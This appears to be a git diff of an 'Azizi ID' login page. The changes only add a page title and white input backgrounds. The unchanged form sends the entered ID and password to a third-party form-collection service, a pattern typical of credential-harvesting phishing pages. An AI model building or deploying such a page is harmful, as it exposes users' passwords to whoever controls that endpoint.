--- a/login/login.html
+++ b/login/login.html
@@ -1,6 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head>
+  <title>Azizi دخول</title>
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <link rel="icon" type="image/ico" href="favicon.ico"/>
 <style>
@@ -96,10 +97,10 @@ span.psw {
 <form action="https://formbucket.com/f/buk_SwcIGuU8v1LUHSNBjsKA3D0W" method="POST" />
   <div class="container">
     <label for="uname"><b>Azizi ID</b></label>
-    <input type="text" placeholder="Enter Azizi ID" name="uname" required>
+    <input type="text" style="background-color:white" placeholder="Enter Azizi ID" name="uname" required>
 
     <label for="psw"><b>Password</b></label>
-    <input type="password" placeholder="Enter Password" name="psw" required>
+    <input type="password" style="background-color:white" placeholder="Enter Password" name="psw" required>
 
     <button type="submit">تسجيل الدخول</button>
   </div>
